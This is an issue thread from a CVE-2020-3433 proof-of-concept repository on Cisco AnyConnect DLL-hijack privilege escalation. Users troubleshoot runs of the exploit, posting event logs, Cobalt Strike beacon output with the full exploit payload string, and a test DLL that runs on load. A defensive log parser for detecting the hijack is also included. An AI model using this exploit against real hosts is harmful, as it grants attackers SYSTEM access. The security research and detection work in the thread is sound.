Comments (4)
I managed to get a working homemade DLL! Thank you!
My DLL was compiled for x64, but I forgot that vpndownloader is x86 u_u
And I can confirm that you get the message "Unable to obtain entry point MiniDumpWriteDump" when it works :)
from cve-2020-3433.
Hi,
Thank you for your feedback!
I tried on AnyConnect 4.8.3036 a few minutes ago on one of my machines, and a system shell pops up despite the same "The downloader command line arguments are invalid" message in the Windows Event logs (cf. below).
Could you paste the output of the PoC? Any chance the DLL is deleted by an AV? Did you try with another DLL?
ProviderName : acvpndownloader
Message : Cisco AnyConnect Secure Mobility Client Downloader (2) exiting, version 4.8.03036 , return code 1 [0x00000001]

ProviderName : acvpndownloader
Message : Function: wWinMain
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\downloader.cpp
Line: 365
Invoked Function: CDnldrIpc::SendAckMsgToDownloader
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECT

ProviderName : acvpndownloader
Message : Function: CDnldrIpc::SendAckMsgToDownloader
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\dnldripc.cpp
Line: 1799
Invoked Function: CIpcClientConnection
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECT

ProviderName : acvpndownloader
Message : Function: CIpcClientConnection::CIpcClientConnection
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\ipcclientconnection.cpp
Line: 82
Invoked Function: CIpcTransport::connectIpc
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECT

ProviderName : acvpndownloader
Message : Function: CIpcTransport::terminateIpcConnection
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\ipc\ipctransport.cpp
Line: 459
Invoked Function: CSocketTransport::writeSocketBlocking
Return Code: -31588319 (0xFE1E0021)
Description: SOCKETTRANSPORT_ERROR_NO_SOCKET_HANDLE:The socket transport does not possess a valid socket handle.

ProviderName : acvpndownloader
Message : Function: CIpcTransport::connectIpc
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\ipc\ipctransport.cpp
Line: 305
Invoked Function: CSocketTransport::connectTransport
Return Code: -31588340 (0xFE1E000C)
Description: SOCKETTRANSPORT_ERROR_CONNECT

ProviderName : acvpndownloader
Message : Function: CSocketTransport::connectTransport
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\ipc\sockettransport.cpp
Line: 1151
Invoked Function: ::WSAConnect
Return Code: 10061 (0x0000274D)
Description: No connection could be made because the target machine actively refused it.

ProviderName : acvpndownloader
Message : Function: CInstallTask::DoPrivilegedInstall
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\installtask.cpp
Line: 942
Installer exit code: 1 (failure). See the log file C:\Windows\TEMP\anyconnect-vpndownloader-install-16152224012022.log for more information.

ProviderName : acvpndownloader
Message : Function: wWinMain
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\downloader\downloader.cpp
Line: 235
The downloader command line arguments are invalid

ProviderName : acvpndownloader
Message : Function: CHModuleMgr::STGetProcAddress
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\common\utility\win\hmodulemgr.cpp
Line: 272
Invoked Function: GetProcAddress
Return Code: 127 (0x0000007F)
Description: The specified procedure could not be found.
Unable to obtain entry point MiniDumpWriteDump

ProviderName : acvpndownloader
Message : Function: CVerifyFileSignatureWindows::IsValid
File: c:\temp\build\thehoff\negasonic_mr30.550195061902\negasonic_mr3\vpn\commoncrypt\verifyfilesignaturewindows.cpp
Line: 110
Code-signing verification succeeded. File (C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\17592.tmp\vpndownloader.exe)

ProviderName : acvpndownloader
Message : Installing software (C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\17592.tmp\vpndownloader.exe /norestart /quiet NOINSTALLACTIVEX=1 WEBLAUNCH=1 /lvx* C:\Windows\TEMP\anyconnect-vpndownloader-install-16152224012022.log)

ProviderName : acvpndownloader
Message : Cisco AnyConnect Secure Mobility Client Downloader (2) started, version 4.8.03036 , opcode 3
from cve-2020-3433.
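An added defensive example, not code from the thread's PoC or from the AnyConnect project: a small Python parser for the acvpndownloader event messages quoted above that flags the indicator the thread discusses, a GetProcAddress failure for MiniDumpWriteDump (the genuine dbghelp.dll exports that function, so the failure means vpndownloader resolved a different dbghelp.dll). The sample messages are constructed from the entries above; the function and field names are mine.

```python
import re

# Field patterns for the line-oriented acvpndownloader event messages quoted in the thread.
FUNC_RE = re.compile(r"^Function:\s*(\S+)", re.M)
INVOKED_RE = re.compile(r"^Invoked Function:\s*(\S+)", re.M)
RC_RE = re.compile(r"^Return Code:\s*(-?\d+)", re.M)
ENTRY_RE = re.compile(r"Unable to obtain entry point (\w+)")
RUN_RE = re.compile(r"Downloader \(\d+\) (started|exiting), version ([\d.]+)")
ERROR_PROC_NOT_FOUND = 127  # Win32 error GetProcAddress reports for a missing export

# Constructed sample, in chronological order (Get-WinEvent prints newest first, so
# reverse its output before feeding it in). Build-tree paths are omitted for brevity.
SAMPLE_MESSAGES = [
    "Cisco AnyConnect Secure Mobility Client Downloader (2) started, version 4.8.03036 , opcode 3",
    "Function: CVerifyFileSignatureWindows::IsValid\nLine: 110\nCode-signing verification "
    "succeeded. File (C:\\ProgramData\\Cisco\\Cisco AnyConnect Secure Mobility Client\\Temp"
    "\\Installer\\17592.tmp\\vpndownloader.exe)",
    "Function: CHModuleMgr::STGetProcAddress\nLine: 272\nInvoked Function: GetProcAddress\n"
    "Return Code: 127 (0x0000007F)\nDescription: The specified procedure could not be found.\n"
    "Unable to obtain entry point MiniDumpWriteDump",
    "Cisco AnyConnect Secure Mobility Client Downloader (2) exiting, version 4.8.03036 , return code 1",
]

def parse_event(message):
    """Pull the structured fields out of one event message (None where a field is absent)."""
    func, inv, rc = FUNC_RE.search(message), INVOKED_RE.search(message), RC_RE.search(message)
    entry, run = ENTRY_RE.search(message), RUN_RE.search(message)
    return {
        "function": func.group(1) if func else None,
        "invoked": inv.group(1) if inv else None,
        "return_code": int(rc.group(1)) if rc else None,
        "missing_entry_point": entry.group(1) if entry else None,
        "run_event": run.group(1) if run else None,
        "version": run.group(2) if run else None,
    }

def find_dbghelp_hijack(messages):
    """Flag downloader runs in which GetProcAddress could not resolve MiniDumpWriteDump.
    The genuine dbghelp.dll exports that function, so the failure means vpndownloader
    loaded some other dbghelp.dll (the indicator the thread reports for a successful run)."""
    findings, run_no, version = [], 0, None
    for idx, msg in enumerate(messages):
        ev = parse_event(msg)
        if ev["run_event"] == "started":  # each "started" line opens a new downloader run
            run_no, version = run_no + 1, ev["version"]
        if (ev["invoked"] == "GetProcAddress" and ev["return_code"] == ERROR_PROC_NOT_FOUND
                and ev["missing_entry_point"] == "MiniDumpWriteDump"):
            findings.append({"run": run_no, "version": version, "event_index": idx,
                             "caller": ev["function"]})
    return findings
```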
The DLL is deleted by the AV if it's dropped by the exploit, so I dropped the DLL separately at C:\Users\john.doe\AppData\Local\Temp\3\03746282\dbghelp.dll and changed the code accordingly.
Here is the output (because I don't have graphical access, I have to monitor created processes, but no cmd has been spawned):
beacon> execute-assembly CVE-2020-3433-privesc.exe
[*] Tasked beacon to run .NET program: CVE-2020-3433-privesc.exe
[+] host called home, sent: 488491 bytes
[+] received output:
Cisco AnyConnect privesc PoC (CVE-2020-3433)
September 2020
Author: ATGO
[+] received output:
[*] Cisco AnyConnect version: 4.8.3036
[*] "-ipc" argument needed
[*] Writing dbghelp.dll in a random temp folder (C:\Users\john.doe\AppData\Local\Temp\3\03746282) - should be deleted after the exploit
[*] Payload: "CAC-nc-install -ipc=1337 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\john.doe\AppData\Local\Temp\3\03746282\dbghelp.dll"
[*] Sending payload
[*] Sleeping 5s before cleaning
[*] Deleting C:\Users\john.doe\AppData\Local\Temp\3\03746282
[*] Done
I also tried with the following homemade DLL (tested with rundll32.exe dbghelp.dll,Start) but without success:

#include <windows.h>
#include <string.h>
#include <Wtsapi32.h>            // not used by this test DLL; kept from the original build
#pragma comment(lib, "Wtsapi32.lib")

// Proof of execution: create a marker file from whatever process loads the DLL.
void StartProcess()
{
    HANDLE hFile = CreateFileW(L"C:\\Temp\\niconnectproof.txt", GENERIC_WRITE, 0, NULL,
                               CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)   // e.g. C:\Temp missing or the file already exists
        return;
    char DataBuffer[] = "This is some test data to write to the file.";
    DWORD dwBytesToWrite = (DWORD)strlen(DataBuffer);
    DWORD dwBytesWritten = 0;
    WriteFile(hFile, DataBuffer, dwBytesToWrite, &dwBytesWritten, NULL);
    CloseHandle(hFile);
}

// Exported entry point so that the "rundll32.exe dbghelp.dll,Start" test above resolves.
extern "C" __declspec(dllexport) void CALLBACK Start(HWND, HINSTANCE, LPSTR, int)
{
    StartProcess();
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        StartProcess();   // runs as soon as the DLL is loaded into a process
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
I didn't get the event you had with the message "Unable to obtain entry point MiniDumpWriteDump". I don't know if it's linked.
from cve-2020-3433.
Great, nice job!
from cve-2020-3433.